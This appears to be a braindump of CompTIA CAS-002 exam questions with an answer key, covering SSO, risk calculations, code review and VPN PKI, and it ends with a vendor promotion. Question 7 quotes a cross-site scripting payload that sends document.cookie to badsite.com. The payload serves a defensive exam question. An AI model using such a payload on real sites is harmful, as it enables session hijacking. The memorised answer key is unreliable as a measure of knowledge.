Question No: 6
Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two-factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backends to ensure proper process flow. How should the employees request access to shared resources before the authentication integration is complete?
A. They should logon to the system using the username concatenated with the 6-digit code and their original password.
B. They should logon to the system using the newly assigned global username: first.lastname#### where #### is the second factor code.
C. They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is depressed.
D. They should use the username format: first.lastname@company.com, together with a password and their 6-digit code.
Answer: D
Question No: 7
A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "'
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM
Answer: A
Question No: 8
The risk manager at a small bank wants to use quantitative analysis to determine the ALE of running a business system at a location which is subject to fires during the year. A risk analyst reports to the risk manager that the asset value of the business system is $120,000 and, based on industry data, the exposure factor to fires is only 20% due to the fire suppression system installed at the site. Fires occur in the area on average every four years. Which of the following is the ALE?
A. $6,000
B. $24,000
C. $30,000
D. $96,000
Answer: A
Question No: 9
An analyst connects to a company web conference hosted on www.webconference.com/meetingID#01234 and observes that numerous guests have been allowed to join, without providing identifying information. The topics covered during the web conference are considered proprietary to the company. Which of the following security concerns does the analyst present to management?
A. Guest users could present a risk to the integrity of the company's information
B. Authenticated users could sponsor guest access that was previously approved by management
C. Unauthenticated users could present a risk to the confidentiality of the company's information
D. Meeting owners could sponsor guest access if they have passed a background check
Answer: C
Question No: 10
A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company's online shopping application. Based on heuristic information from the Security Operations Center (SOC), a Denial of Service (DoS) attack has been successfully executed 5 times a year. The Business Operations department has determined the loss associated with each attack is $40,000. After implementing application caching, the number of DoS attacks was reduced to one time a year. The cost of the countermeasures was $100,000. Which of the following is the monetary value earned during the first year of operation?
A. $60,000
B. $100,000
C. $140,000
D. $200,000
Answer: A
Question No: 11
The following has been discovered in an internally developed application:
Error - Memory allocated but not freed:
char *myBuffer = malloc(BUFFER_SIZE);
if (myBuffer != NULL) {
    *myBuffer = STRING_WELCOME_MESSAGE;
    printf("Welcome to: %s\n", myBuffer);
}
exit(0);
Which of the following security assessment methods are likely to reveal this security weakness? (Select TWO).
A. Static code analysis
B. Memory dumping
C. Manual code review
D. Application sandboxing
E. Penetration testing
F. Black box testing
Answer: A,C
Question No: 12
The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer's (CSO) request to harden the corporate network's perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary?
A. The corporate network is the only network that is audited by regulators and customers.
B. The aggregation of employees on a corporate network makes it a more valuable target for attackers.
C. Home networks are unknown to attackers and less likely to be targeted directly.
D. Employees are more likely to be using personal computers for general web browsing when they are at home.
Answer: B
Question No: 13
A security architect has been engaged during the implementation stage of the SDLC to review a new HR software installation for security gaps. With the project under a tight schedule to meet market commitments on project delivery, which of the following security activities should be prioritized by the security architect? (Select TWO).
A. Perform penetration testing over the HR solution to identify technical vulnerabilities
B. Perform a security risk assessment with recommended solutions to close off high-rated risks
C. Secure code review of the HR solution to identify security gaps that could be exploited
D. Perform access control testing to ensure that privileges have been configured correctly
E. Determine if the information security standards have been complied with by the project
Answer: B,E
Question No: 14
A senior network security engineer has been tasked to decrease the attack surface of the corporate network. Which of the following actions would protect the external network interfaces from external attackers performing network scanning?
A. Remove contact details from the domain name registrar to prevent social engineering attacks.
B. Test external interfaces to see how they function when they process fragmented IP packets.
C. Enable a honeynet to capture and facilitate future analysis of malicious attack vectors.
D. Filter all internal ICMP message traffic, forcing attackers to use full-blown TCP port scans against external network interfaces.
Answer: B
Question No: 15
A security administrator is tasked with implementing two-factor authentication for the company VPN. The VPN is currently configured to authenticate VPN users against a backend RADIUS server. New company policies require a second factor of authentication, and the Information Security Officer has selected PKI as the second factor. Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no error messages are displayed to the user during the VPN connection? (Select TWO).
A. The user's certificate private key must be installed on the VPN concentrator.
B. The CA's certificate private key must be installed on the VPN concentrator.
C. The user certificate private key must be signed by the CA.
D. The VPN concentrator's certificate private key must be signed by the CA and installed on the VPN concentrator.
E. The VPN concentrator's certificate private key must be installed on the VPN concentrator.
F. The CA's certificate public key must be installed on the VPN concentrator.
Answer: E,F
100% Updated CompTIA CAS-002 Questions & Answers shared by Certifytools, Get HERE: https://www.certifytools.com/CAS-002-exam.html (New 450 Q&As)